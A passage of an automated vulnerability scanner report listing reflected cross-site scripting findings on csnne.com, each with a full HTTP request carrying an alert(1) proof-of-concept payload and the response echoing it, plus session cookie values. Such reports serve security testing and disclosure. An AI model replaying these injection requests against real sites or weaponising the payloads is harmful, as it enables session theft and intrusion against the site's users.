GET /common/FB3f72b<script>alert(1)</script>202c08465c0/xd_receiver.htm HTTP/1.1
Host: www.csnne.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/extern/login_status.php?api_key=d4987ffea863a57509cd6a8810c955e4&extern=0&channel=http%3A%2F%2Fwww.csnne.com%2Fcommon%2FFB%2Fxd_receiver.htm&locale=en_US
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=19305e613eff95a8ebf98a6202a7f4c0; __utma=262035615.896046343.1292783182.1292783182.1292783182.1; __utmb=262035615; __utmc=262035615; __utmz=262035615.1292783182.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:36:19 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:36:19 GMT
Connection: close
Content-Length: 769

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/common/FB3f72b<script>alert(1)</script>202c08465c0/xd_receiver.htm"</strong>
...[SNIP]...

2.351. http://www.csnne.com/common/FB/xd_receiver.htm [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnne.com
Path:   /common/FB/xd_receiver.htm

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 8ab24<script>alert(1)</script>24ed3184db6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /common/FB/xd_receiver.htm8ab24<script>alert(1)</script>24ed3184db6 HTTP/1.1
Host: www.csnne.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/extern/login_status.php?api_key=d4987ffea863a57509cd6a8810c955e4&extern=0&channel=http%3A%2F%2Fwww.csnne.com%2Fcommon%2FFB%2Fxd_receiver.htm&locale=en_US
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=19305e613eff95a8ebf98a6202a7f4c0; __utma=262035615.896046343.1292783182.1292783182.1292783182.1; __utmb=262035615; __utmc=262035615; __utmz=262035615.1292783182.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:36:19 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:36:19 GMT
Connection: close
Content-Length: 769

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/common/FB/xd_receiver.htm8ab24<script>alert(1)</script>24ed3184db6"</strong>
...[SNIP]...

2.352. http://www.csnne.com/common/ad_count.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnne.com
Path:   /common/ad_count.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2a272<script>alert(1)</script>49eb8ac91a7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /common2a272<script>alert(1)</script>49eb8ac91a7/ad_count.php HTTP/1.1
Host: www.csnne.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: base_domain_d4987ffea863a57509cd6a8810c955e4=csnne.com; __utmz=262035615.1292783182.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fbsetting_d4987ffea863a57509cd6a8810c955e4=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; PHPSESSID=19305e613eff95a8ebf98a6202a7f4c0; __utma=262035615.896046343.1292783182.1292783182.1292783182.1; __utmc=262035615; __utmb=262035615;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:32:41 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:32:41 GMT
Content-Length: 763
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/common2a272<script>alert(1)</script>49eb8ac91a7/ad_count.php"</strong>
...[SNIP]...

2.353. http://www.csnne.com/common/ad_count.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnne.com
Path:   /common/ad_count.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 50617<script>alert(1)</script>a89c9152d01 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /common/ad_count.php50617<script>alert(1)</script>a89c9152d01 HTTP/1.1
Host: www.csnne.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: base_domain_d4987ffea863a57509cd6a8810c955e4=csnne.com; __utmz=262035615.1292783182.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fbsetting_d4987ffea863a57509cd6a8810c955e4=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; PHPSESSID=19305e613eff95a8ebf98a6202a7f4c0; __utma=262035615.896046343.1292783182.1292783182.1292783182.1; __utmc=262035615; __utmb=262035615;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:32:41 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:32:41 GMT
Content-Length: 763
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/common/ad_count.php50617<script>alert(1)</script>a89c9152d01"</strong>
...[SNIP]...

2.354. http://www.csnne.com/common/global_flash/player/player.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnne.com
Path:   /common/global_flash/player/player.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 5f769<script>alert(1)</script>7a6f7887f8f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /common5f769<script>alert(1)</script>7a6f7887f8f/global_flash/player/player.php HTTP/1.1
Host: www.csnne.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: base_domain_d4987ffea863a57509cd6a8810c955e4=csnne.com; __utmz=262035615.1292783182.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fbsetting_d4987ffea863a57509cd6a8810c955e4=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; PHPSESSID=19305e613eff95a8ebf98a6202a7f4c0; __utma=262035615.896046343.1292783182.1292783182.1292783182.1; __utmc=262035615; __utmb=262035615;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:32:43 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:32:43 GMT
Content-Length: 781
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/common5f769<script>alert(1)</script>7a6f7887f8f/global_flash/player/player.php"</strong>
...[SNIP]...

2.355. http://www.csnne.com/common/global_flash/player/player.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnne.com
Path:   /common/global_flash/player/player.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 60dd4<script>alert(1)</script>8d0c9768234 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /common/global_flash60dd4<script>alert(1)</script>8d0c9768234/player/player.php HTTP/1.1
Host: www.csnne.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: base_domain_d4987ffea863a57509cd6a8810c955e4=csnne.com; __utmz=262035615.1292783182.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fbsetting_d4987ffea863a57509cd6a8810c955e4=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; PHPSESSID=19305e613eff95a8ebf98a6202a7f4c0; __utma=262035615.896046343.1292783182.1292783182.1292783182.1; __utmc=262035615; __utmb=262035615;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:32:43 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:32:43 GMT
Content-Length: 781
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/common/global_flash60dd4<script>alert(1)</script>8d0c9768234/player/player.php"</strong>
...[SNIP]...

2.356. http://www.csnne.com/common/global_flash/player/player.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnne.com
Path:   /common/global_flash/player/player.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b0d06<script>alert(1)</script>267a33c228c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /common/global_flash/playerb0d06<script>alert(1)</script>267a33c228c/player.php HTTP/1.1
Host: www.csnne.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: base_domain_d4987ffea863a57509cd6a8810c955e4=csnne.com; __utmz=262035615.1292783182.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fbsetting_d4987ffea863a57509cd6a8810c955e4=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; PHPSESSID=19305e613eff95a8ebf98a6202a7f4c0; __utma=262035615.896046343.1292783182.1292783182.1292783182.1; __utmc=262035615; __utmb=262035615;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:32:43 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:32:43 GMT
Content-Length: 781
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/common/global_flash/playerb0d06<script>alert(1)</script>267a33c228c/player.php"</strong>
...[SNIP]...

2.357. http://www.csnne.com/common/global_flash/player/player.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnne.com
Path:   /common/global_flash/player/player.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f675b<script>alert(1)</script>d741c79dba7 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /common/global_flash/player/player.phpf675b<script>alert(1)</script>d741c79dba7 HTTP/1.1
Host: www.csnne.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: base_domain_d4987ffea863a57509cd6a8810c955e4=csnne.com; __utmz=262035615.1292783182.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fbsetting_d4987ffea863a57509cd6a8810c955e4=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; PHPSESSID=19305e613eff95a8ebf98a6202a7f4c0; __utma=262035615.896046343.1292783182.1292783182.1292783182.1; __utmc=262035615; __utmb=262035615;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:32:43 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:32:43 GMT
Content-Length: 781
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/common/global_flash/player/player.phpf675b<script>alert(1)</script>d741c79dba7"</strong>
...[SNIP]...

2.358. http://www.csnne.com/common/js/aggregate.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnne.com
Path:   /common/js/aggregate.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload d7f12<script>alert(1)</script>e6b10e0cb43 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /common/js/d7f12<script>alert(1)</script>e6b10e0cb43 HTTP/1.1
Host: www.csnne.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: base_domain_d4987ffea863a57509cd6a8810c955e4=csnne.com; __utmz=262035615.1292783182.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fbsetting_d4987ffea863a57509cd6a8810c955e4=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; PHPSESSID=19305e613eff95a8ebf98a6202a7f4c0; __utma=262035615.896046343.1292783182.1292783182.1292783182.1; __utmc=262035615; __utmb=262035615;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:32:41 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:32:41 GMT
Content-Length: 754
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/common/js/d7f12<script>alert(1)</script>e6b10e0cb43"</strong>
...[SNIP]...

2.359. http://www.csnne.com/pages/coldhardfootballfacts [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnne.com
Path:   /pages/coldhardfootballfacts

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a0e2d<script>alert(1)</script>e142e3b5e09 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pagesa0e2d<script>alert(1)</script>e142e3b5e09/coldhardfootballfacts HTTP/1.1
Host: www.csnne.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: base_domain_d4987ffea863a57509cd6a8810c955e4=csnne.com; __utmz=262035615.1292783182.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fbsetting_d4987ffea863a57509cd6a8810c955e4=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; PHPSESSID=19305e613eff95a8ebf98a6202a7f4c0; __utma=262035615.896046343.1292783182.1292783182.1292783182.1; __utmc=262035615; __utmb=262035615;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:32:56 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:32:56 GMT
Content-Length: 771
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/pagesa0e2d<script>alert(1)</script>e142e3b5e09/coldhardfootballfacts"</strong>
...[SNIP]...

2.360. http://www.csnne.com/pages/coldhardfootballfacts [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnne.com
Path:   /pages/coldhardfootballfacts

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 62897<script>alert(1)</script>af2e9b3fa8b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /pages/coldhardfootballfacts62897<script>alert(1)</script>af2e9b3fa8b HTTP/1.1
Host: www.csnne.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: base_domain_d4987ffea863a57509cd6a8810c955e4=csnne.com; __utmz=262035615.1292783182.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fbsetting_d4987ffea863a57509cd6a8810c955e4=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; PHPSESSID=19305e613eff95a8ebf98a6202a7f4c0; __utma=262035615.896046343.1292783182.1292783182.1292783182.1; __utmc=262035615; __utmb=262035615;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:32:56 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:32:56 GMT
Content-Length: 790
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/common/404.html?p=/pages/coldhardfootballfacts62897<script>alert(1)</script>af2e9b3fa8b"</strong>
...[SNIP]...

2.361. http://www.csnne.com/pages/coldhardfootballfacts [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnne.com
Path:   /pages/coldhardfootballfacts

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7820"><script>alert(1)</script>726d0aa2c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pages/coldhardfootballfacts?d7820"><script>alert(1)</script>726d0aa2c=1 HTTP/1.1
Host: www.csnne.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: base_domain_d4987ffea863a57509cd6a8810c955e4=csnne.com; __utmz=262035615.1292783182.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fbsetting_d4987ffea863a57509cd6a8810c955e4=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; PHPSESSID=19305e613eff95a8ebf98a6202a7f4c0; __utma=262035615.896046343.1292783182.1292783182.1292783182.1; __utmc=262035615; __utmb=262035615;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 78225
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:32:55 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:32:55 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<input type=hidden name="d7820"><script>alert(1)</script>726d0aa2c" id = "d7820">
...[SNIP]...

2.362. http://www.csnne.com/pages/v3_sportsnetcentralupdate [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnne.com
Path:   /pages/v3_sportsnetcentralupdate

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 22592<script>alert(1)</script>ec10aac25dd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pages22592<script>alert(1)</script>ec10aac25dd/v3_sportsnetcentralupdate HTTP/1.1
Host: www.csnne.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: base_domain_d4987ffea863a57509cd6a8810c955e4=csnne.com; __utmz=262035615.1292783182.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fbsetting_d4987ffea863a57509cd6a8810c955e4=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; PHPSESSID=19305e613eff95a8ebf98a6202a7f4c0; __utma=262035615.896046343.1292783182.1292783182.1292783182.1; __utmc=262035615; __utmb=262035615;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:32:55 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:32:55 GMT
Content-Length: 775
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/pages22592<script>alert(1)</script>ec10aac25dd/v3_sportsnetcentralupdate"</strong>
...[SNIP]...

2.363. http://www.csnne.com/pages/v3_sportsnetcentralupdate [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnne.com
Path:   /pages/v3_sportsnetcentralupdate

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7042f<script>alert(1)</script>17bd18741be was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /pages/v3_sportsnetcentralupdate7042f<script>alert(1)</script>17bd18741be HTTP/1.1
Host: www.csnne.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: base_domain_d4987ffea863a57509cd6a8810c955e4=csnne.com; __utmz=262035615.1292783182.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fbsetting_d4987ffea863a57509cd6a8810c955e4=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; PHPSESSID=19305e613eff95a8ebf98a6202a7f4c0; __utma=262035615.896046343.1292783182.1292783182.1292783182.1; __utmc=262035615; __utmb=262035615;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:32:55 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:32:55 GMT
Content-Length: 794
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/common/404.html?p=/pages/v3_sportsnetcentralupdate7042f<script>alert(1)</script>17bd18741be"</strong>
...[SNIP]...

2.364. http://www.csnne.com/pages/v3_sportsnetcentralupdate [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnne.com
Path:   /pages/v3_sportsnetcentralupdate

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33f46"><script>alert(1)</script>d8125d0d239 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pages/v3_sportsnetcentralupdate?33f46"><script>alert(1)</script>d8125d0d239=1 HTTP/1.1
Host: www.csnne.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: base_domain_d4987ffea863a57509cd6a8810c955e4=csnne.com; __utmz=262035615.1292783182.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fbsetting_d4987ffea863a57509cd6a8810c955e4=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; PHPSESSID=19305e613eff95a8ebf98a6202a7f4c0; __utma=262035615.896046343.1292783182.1292783182.1292783182.1; __utmc=262035615; __utmb=262035615;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 56351
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:32:55 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:32:55 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<input type=hidden name="33f46"><script>alert(1)</script>d8125d0d239" id = "33f46">
...[SNIP]...

2.365. http://www.csnne.com/pages/v3_video [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnne.com
Path:   /pages/v3_video

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8ad77<script>alert(1)</script>6b2cbf250f6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pages8ad77<script>alert(1)</script>6b2cbf250f6/v3_video HTTP/1.1
Host: www.csnne.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
